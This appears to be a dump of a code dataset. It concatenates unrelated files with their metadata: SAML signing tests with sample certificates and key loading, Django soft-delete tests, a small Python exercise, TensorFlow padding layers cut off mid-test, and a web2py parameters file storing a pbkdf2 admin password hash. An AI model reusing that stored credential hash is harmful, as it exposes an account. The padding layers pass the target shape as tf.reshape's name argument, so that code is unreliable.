AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion></samlp:Response>' SIGNED_RESPONSE_WITH_SIGNED_ASSERTION_SALESFORCE_XML = '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://www.example.net/a/example.com/acs" ID="_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4" InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://127.0.0.1:8000</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference URI="#_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod 
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>sxi1OztMxi2taVoT3kxaVXQrVx4=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>tErJwi7CBpFWXQRKxEcpkoNZKDv2D1D1hBOlEWWYOyrU5eGaaLFrQ/dMA3D7S0lGjGEf7YkkgiZOAE4dKVHhUg==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"></samlp:StatusCode></samlp:Status><saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference URI="#_7ccdda8bc6b328570c03b218d7521772998da45374"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform 
Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>b7HwOJQgKYvhWcrUH17T8WXTY24=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>WP+9aFiuj52WLW6ebwSaQhF2nU/wtyP3E2dudTa6mVTSjItpqduUqWR3rp/q39Hsehde6i+4RlbGQkZUwZSPEw==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement 
AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion></samlp:Response>' X509_CERTIFICATE_DATA = "MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==" # noqa class XmlTest(unittest.TestCase, XmlTestMixin): def _test(self, got, exp): if type(got) != str: got = ET.tostring(got, method='c14n', exclusive=True).decode('utf-8') if type(exp) != str: exp = ET.tostring(exp, method='c14n', exclusive=True).decode('utf-8') self.assertXmlDocument(got) self.assertXmlEquivalentOutputs(got, exp) def _test_template(self, template_source, parameters, exp): xml_render._get_in_response_to(parameters) got = template_source(parameters).get_xml_string() self._test(got, exp) class TestSigning(XmlTest): def test1(self): signature_xml = get_signature_xml("this is a test", 'abcd' * 10) expected_xml = '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference 
URI="#abcdabcdabcdabcdabcdabcdabcdabcdabcdabcd"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>+ia+Gd5r/5P3C8IwhDTkpEC7rQI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>t1IywxEzobY8ZyHL+iuB+E3zzVAWByUjRqFTdyNerGbGSRwo0oYWx6hcYX+ST1DTDaQ50gV2PJeibbykFsA3vQ==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature>' self._test(ET.tostring(signature_xml, method='c14n').decode('utf-8'), expected_xml) class TestAssertionSalesForce(XmlTest): def test_assertion(self): # This test simply verifies that the template isn't bad. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) params.update(ASSERTION_SALESFORCE_PARAMS) self._test_template(xml_templates.AssertionSalesforceTemplate, params, ASSERTION_SALESFORCE_XML) def test_assertion_rendering(self): # Verifies that the xml rendering is OK. 
params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) params.update(ASSERTION_SALESFORCE_PARAMS) got = xml_render.get_assertion_salesforce_xml(params, signed=False) self._test(got, ASSERTION_SALESFORCE_XML) def test_signed_assertion(self): # This test verifies that the assertion got signed properly. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) params.update(ASSERTION_SALESFORCE_PARAMS) got = xml_render.get_assertion_salesforce_xml(params, signed=True) self._test(got, SIGNED_ASSERTION_SALESFORCE_XML) class TestResponse(XmlTest): def test_response(self): # This test simply verifies that the template isn't bad. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) xml_render._get_in_response_to(params) got = xml_templates.ResponseTemplate( params, ASSERTION_SALESFORCE_XML).get_xml_string() self._test(got, RESPONSE_XML) def test_response_rendering(self): # Verifies that the rendering is OK. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) got = xml_render.get_response_xml(params, ASSERTION_SALESFORCE_XML, signed=False) self._test(got, RESPONSE_XML) def test_response_with_signed_assertion(self): # This test also verifies that the template isn't bad. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) got = xml_render.get_response_xml(params, SIGNED_ASSERTION_SALESFORCE_XML, signed=False) self._test(got, RESPONSE_WITH_SIGNED_ASSERTION_SALESFORCE_XML) def test_signed_response_with_signed_assertion(self): # This test verifies that the response got signed properly. 
params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) got = xml_render.get_response_xml(params, SIGNED_ASSERTION_SALESFORCE_XML, signed=True) self._test(got, SIGNED_RESPONSE_WITH_SIGNED_ASSERTION_SALESFORCE_XML) def test_loading_private_key(): filename = os.path.join(os.getcwd(), 'keys/sample/sample-private-key.pem') config = {smd.PRIVATE_KEY_FILENAME: filename} assert type(filename) is str xml_signing.load_private_key(config) filename = filename.encode('utf-8') config = {smd.PRIVATE_KEY_FILENAME: filename} xml_signing.load_private_key(config) def test_signing_data_with_private_key(): filename = os.path.join(os.getcwd(), 'keys/sample/sample-private-key.pem') config = {smd.PRIVATE_KEY_FILENAME: filename} private_key = xml_signing.load_private_key(config) data = "Some interesting data." signature = xml_signing.sign_with_rsa(private_key, data) assert signature != data def test_loading_certificate_from_file(): filename = os.path.join(os.getcwd(), 'keys/sample/sample-certificate.pem') config = {smd.CERTIFICATE_FILENAME: filename} assert type(filename) is str xml_signing.load_certificate(config) filename = filename.encode('utf-8') config = {smd.CERTIFICATE_FILENAME: filename} certificate = xml_signing.load_certificate(config) assert certificate == X509_CERTIFICATE_DATA def test_loading_certificate_from_string(settings): config = {smd.CERTIFICATE_DATA: X509_CERTIFICATE_DATA} certificate = xml_signing.load_certificate(config) assert certificate == X509_CERTIFICATE_DATA
116.176471
5,112
0.803122
2,506
23,700
7.489625
0.094573
0.004156
0.019926
0.024775
0.899728
0.887527
0.86872
0.861207
0.834461
0.82519
0
0.085589
0.069241
23,700
203
5,113
116.748768
0.765266
0.016624
0
0.432258
0
0.045161
0.748058
0.294698
0
0
0
0
0.245161
1
0.090323
false
0.032258
0.058065
0
0.174194
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
1
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
e081ecf9a706038b47f5d1216ac98e3405428f28
84
py
Python
exporter/__init__.py
moehrenzahn/worktimer
ab92e8625652d94987c7da8ccdbf29be72bf3612
[ "MIT" ]
3
2018-07-29T20:48:15.000Z
2019-03-29T10:42:19.000Z
exporter/__init__.py
moehrenzahn/worktimer
ab92e8625652d94987c7da8ccdbf29be72bf3612
[ "MIT" ]
null
null
null
exporter/__init__.py
moehrenzahn/worktimer
ab92e8625652d94987c7da8ccdbf29be72bf3612
[ "MIT" ]
null
null
null
from exporter.excel import * from exporter.ods import * from exporter.text import *
21
28
0.785714
12
84
5.5
0.5
0.545455
0.545455
0
0
0
0
0
0
0
0
0
0.142857
84
3
29
28
0.916667
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
e0838a257f6cd72c35cd75e7ab8f2a33ece1f927
3,611
py
Python
tests/tests/logical_deletion/tests.py
ChanTsune/Django-Boost
5141605132c1d46aee978ee3cdbc8db5e9d4b8c4
[ "MIT" ]
25
2019-05-23T11:19:18.000Z
2022-02-19T15:28:09.000Z
tests/tests/logical_deletion/tests.py
ChanTsune/Django-Boost
5141605132c1d46aee978ee3cdbc8db5e9d4b8c4
[ "MIT" ]
49
2019-09-17T08:40:22.000Z
2022-03-02T14:08:27.000Z
tests/tests/logical_deletion/tests.py
ChanTsune/Django-Boost
5141605132c1d46aee978ee3cdbc8db5e9d4b8c4
[ "MIT" ]
4
2019-09-17T08:16:55.000Z
2020-08-24T09:33:16.000Z
from django.test import TestCase, override_settings @override_settings( DATABASES={ 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': ':memory:', } } ) class TestLogicalDeletionMixin(TestCase): from .models import LogicalDeletionModel model = LogicalDeletionModel def _register_items(self, *args): for item in args: self.model.objects.create(name=item) def test_delete(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertNotEqual(item.deleted_at, None) def test_hard_delete(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete(hard=True) with self.assertRaises(self.model.DoesNotExist): self.model.objects.get(name="0") def test_alive(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertEqual(len(self.model.objects.alive()), 9) def test_dead(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertEqual(len(self.model.objects.dead()), 1) def test_revive(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertEqual(len(self.model.objects.dead()), 1) self.assertEqual(len(self.model.objects.alive()), 9) item.revive() self.assertEqual(len(self.model.objects.dead()), 0) self.assertEqual(len(self.model.objects.alive()), 10) def test_is_dead(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertTrue(item.is_dead()) def test_is_alive(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") self.assertTrue(item.is_alive()) class TestLogicalDeletionManager(TestCase): from .models import LogicalDeletionModel model = LogicalDeletionModel def _register_items(self, *args): for item in args: self.model.objects.create(name=item) def 
_hard_delete(self): for i in self.model.objects.all(): i.delete(hard=True) def test_delete(self): self._register_items(*[str(i) for i in range(10)]) self.model.objects.delete() self.assertEqual(len(self.model.objects.dead()), 10) self._hard_delete() def test_hard_delete(self): self._register_items(*[str(i) for i in range(10)]) self.model.objects.delete(hard=True) self.assertEqual(len(self.model.objects.dead()), 0) self.assertEqual(len(self.model.objects.alive()), 0) self.assertEqual(len(self.model.objects.all()), 0) self._hard_delete() def test_revive(self): self._register_items(*[str(i) for i in range(10)]) self.model.objects.delete() self.assertEqual(len(self.model.objects.dead()), 10) self.assertEqual(len(self.model.objects.alive()), 0) self.assertEqual(len(self.model.objects.all()), 10) self.model.objects.revive() self.assertEqual(len(self.model.objects.dead()), 0) self.assertEqual(len(self.model.objects.alive()), 10) self.assertEqual(len(self.model.objects.all()), 10) self._hard_delete()
33.747664
61
0.62725
473
3,611
4.680761
0.120507
0.130081
0.224029
0.158988
0.809846
0.799006
0.788166
0.788166
0.767389
0.745257
0
0.018253
0.226253
3,611
106
62
34.066038
0.774159
0
0
0.674419
0
0
0.016339
0.0072
0
0
0
0
0.232558
1
0.151163
false
0
0.034884
0
0.232558
0
0
0
0
null
0
1
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
e0f731f257289cbc8a4bd73794fd3cd4a2876254
92
py
Python
parameters_8000.py
pjavete/web2py
b6a3837f0b1f304f01233bd1a2e57fb6fb4d2646
[ "BSD-3-Clause" ]
null
null
null
parameters_8000.py
pjavete/web2py
b6a3837f0b1f304f01233bd1a2e57fb6fb4d2646
[ "BSD-3-Clause" ]
null
null
null
parameters_8000.py
pjavete/web2py
b6a3837f0b1f304f01233bd1a2e57fb6fb4d2646
[ "BSD-3-Clause" ]
null
null
null
password="pbkdf2(1000,20,sha512)$b8282e41158ade42$ac63185d61256ecf1045b6681c733a022327dc62"
46
91
0.891304
7
92
11.714286
1
0
0
0
0
0
0
0
0
0
0
0.549451
0.01087
92
1
92
92
0.351648
0
0
0
0
0
0.869565
0.869565
0
0
0
0
0
1
0
false
1
0
0
0
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
1
0
0
0
0
0
8
e0fc632f5472565906feb14e4c037a889a5c20a7
734
py
Python
exerciciios/ex031.py
uneves/exercicios-cursoemvideo-python-01
562a7954f33bb7ede090421fb60ce8f2cda8b941
[ "MIT" ]
null
null
null
exerciciios/ex031.py
uneves/exercicios-cursoemvideo-python-01
562a7954f33bb7ede090421fb60ce8f2cda8b941
[ "MIT" ]
null
null
null
exerciciios/ex031.py
uneves/exercicios-cursoemvideo-python-01
562a7954f33bb7ede090421fb60ce8f2cda8b941
[ "MIT" ]
null
null
null
dist = float(input('Informe a distancia da viagem: ')) if dist<=200: print('O valor da viagem é: R$ {:.2f}'.format(dist*0.5)) else: print('O valor da viagem é: R$ {:.2f}'.format(dist*0.45)) #### # ou #### dist = float(input('Informe a distancia da viagem: ')) print('voce está prestes a comecar uma viagen de {} km'.format(dist)) if dist<=200: preco = dist * 0.50 else: preco = dist * 0.45 print('E o preco de sua passagem será de R$ {:.2f}'.format(preco)) ##### # ou ##### dist = float(input('Informe a distancia da viagem: ')) print('voce está prestes a comecar uma viagen de {} km'.format(dist)) preco = dist * 0.50 if dist <= 200 else dist * 0.45 print('E o preco de sua passagem será de R$ {:.2f}'.format(preco))
31.913043
69
0.634877
127
734
3.669291
0.283465
0.064378
0.077253
0.135193
0.847639
0.847639
0.847639
0.847639
0.763949
0.763949
0
0.049751
0.178474
734
22
70
33.363636
0.723051
0.006812
0
0.6875
0
0
0.470339
0
0
0
0
0
0
1
0
false
0.125
0
0
0
0.375
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
1c9f503f35a9b6be8c04f9d5183d146ff2e6e259
11,628
py
Python
tensorflow/optotf/keras/pad.py
VLOGroup/optox
f9d61d64aa7bb44080601517539ba5aefd75d365
[ "MIT" ]
7
2020-06-17T21:05:46.000Z
2021-03-28T03:52:53.000Z
tensorflow/optotf/keras/pad.py
khammernik/optox
ae8bf1b4c1bfeb1e2fea24f549182d5610e09d82
[ "MIT" ]
4
2021-01-26T12:43:41.000Z
2022-02-10T00:01:41.000Z
tensorflow/optotf/keras/pad.py
khammernik/optox
ae8bf1b4c1bfeb1e2fea24f549182d5610e09d82
[ "MIT" ]
4
2020-09-16T10:03:48.000Z
2022-01-05T01:22:14.000Z
import tensorflow as tf import optotf.pad import unittest class Pad2d(tf.keras.layers.Layer): def __init__(self, padding, mode, channel_last=True): super().__init__() self.padding = padding self.mode = mode self.channel_last = channel_last self.op = optotf.pad._ext.pad2d def build(self, input_shape): shape = tf.unstack(input_shape) if self.channel_last: shape = [shape[0], shape[-1], *shape[1:-1]] new_shape = [-1, *shape[2:]] new_shape = tf.stack(new_shape) padded_shape = shape padded_shape[-2] += self.padding[2] + self.padding[3] padded_shape[-1] += self.padding[0] + self.padding[1] padded_shape = tf.stack(padded_shape) self.pre_pad_shape = new_shape self.post_pad_shape = padded_shape def call(self, x): # first reshape the input if self.channel_last: x = tf.transpose(x, [0, 3, 1, 2]) x_r = tf.reshape(x, self.pre_pad_shape, self.post_pad_shape) if x.dtype == tf.complex64 or x.dtype == tf.complex128: x_r = tf.complex(self.op(tf.math.real(x_r), left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], mode=self.mode), self.op(tf.math.imag(x_r), left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], mode=self.mode)) else: x_r = self.op(x_r, left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], mode=self.mode) if self.channel_last: return tf.transpose(tf.reshape(x_r, self.post_pad_shape), [0, 2, 3, 1]) else: return tf.reshape(x_r, self.post_pad_shape) class Pad2dTranspose(Pad2d): def __init__(self, padding, mode, channel_last=True): super().__init__(padding, mode, channel_last=channel_last) self.op = optotf.pad._ext.pad2d_transpose def build(self, input_shape): shape = tf.unstack(input_shape) if self.channel_last: shape = [shape[0], shape[-1], *shape[1:-1]] new_shape = [-1, *shape[2:]] new_shape = tf.stack(new_shape) padded_shape = shape padded_shape[-2] -= self.padding[2] + self.padding[3] padded_shape[-1] -= self.padding[0] + self.padding[1] padded_shape = 
tf.stack(padded_shape) self.pre_pad_shape = new_shape self.post_pad_shape = padded_shape class Pad3d(tf.keras.layers.Layer): def __init__(self, padding, mode, channel_last=True): super().__init__() self.padding = padding self.mode = mode self.channel_last = channel_last self.op = optotf.pad._ext.pad3d def build(self, input_shape): shape = tf.unstack(input_shape) if self.channel_last: shape = [shape[0], shape[-1], *shape[1:-1]] new_shape = [-1, *shape[2:]] new_shape = tf.stack(new_shape) padded_shape = shape padded_shape[-3] += self.padding[4] + self.padding[5] padded_shape[-2] += self.padding[2] + self.padding[3] padded_shape[-1] += self.padding[0] + self.padding[1] padded_shape = tf.stack(padded_shape) self.pre_pad_shape = new_shape self.post_pad_shape = padded_shape def call(self, x): # first reshape the input if self.channel_last: x = tf.transpose(x, [0, 2, 3, 4, 1]) x_r = tf.reshape(x, self.pre_pad_shape, self.post_pad_shape) if x.dtype == tf.complex64 or x.dtype == tf.complex128: x_r = tf.complex(self.op(tf.math.real(x_r), left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], front=self.padding[4], back=self.padding[5], mode=self.mode), self.op(tf.math.imag(x_r), left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], front=self.padding[4], back=self.padding[5], mode=self.mode)) else: x_r = self.op(x_r, left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], front=self.padding[4], back=self.padding[5], mode=self.mode) if self.channel_last: return tf.transpose(tf.reshape(x_r, self.post_pad_shape), [0, 2, 3, 4, 1]) else: return tf.reshape(x_r, self.post_pad_shape) class Pad3dTranspose(Pad3d): def __init__(self, padding, mode, channel_last=True): super().__init__(padding, mode, channel_last=channel_last) self.op = optotf.pad._ext.pad3d_transpose def build(self, input_shape): shape = tf.unstack(input_shape) if self.channel_last: shape = [shape[0], shape[-1], 
*shape[1:-1]] new_shape = [-1, *shape[2:]] new_shape = tf.stack(new_shape) padded_shape = shape padded_shape[-3] -= self.padding[4] + self.padding[5] padded_shape[-2] -= self.padding[2] + self.padding[3] padded_shape[-1] -= self.padding[0] + self.padding[1] padded_shape = tf.stack(padded_shape) self.pre_pad_shape = new_shape self.post_pad_shape = padded_shape class TestPad(unittest.TestCase): def test2d(self): shape = (5, 2, 10, 10) x = tf.random.normal(shape) padding = [2, 2, 4, 4] op = Pad2d(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] += padding[0] + padding[1] new_shape[-2] += padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_complex(self): shape = (5, 2, 10, 10) x = tf.complex(tf.random.normal(shape), tf.random.normal(shape)) padding = [2, 2, 4, 4] op = Pad2d(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] += padding[0] + padding[1] new_shape[-2] += padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_channel_last(self): shape = (5, 10, 10, 2) x = tf.random.normal(shape) padding = [2, 2, 4, 4] op = Pad2d(padding=padding, mode='symmetric', channel_last=True) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-2] += padding[0] + padding[1] new_shape[-3] += padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d(self): shape = (5, 2, 8, 10, 10) x = tf.random.normal(shape) padding = [2, 2, 4, 4, 1, 1] op = Pad3d(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] += padding[0] + padding[1] new_shape[-2] += padding[2] + padding[3] new_shape[-3] += padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == 
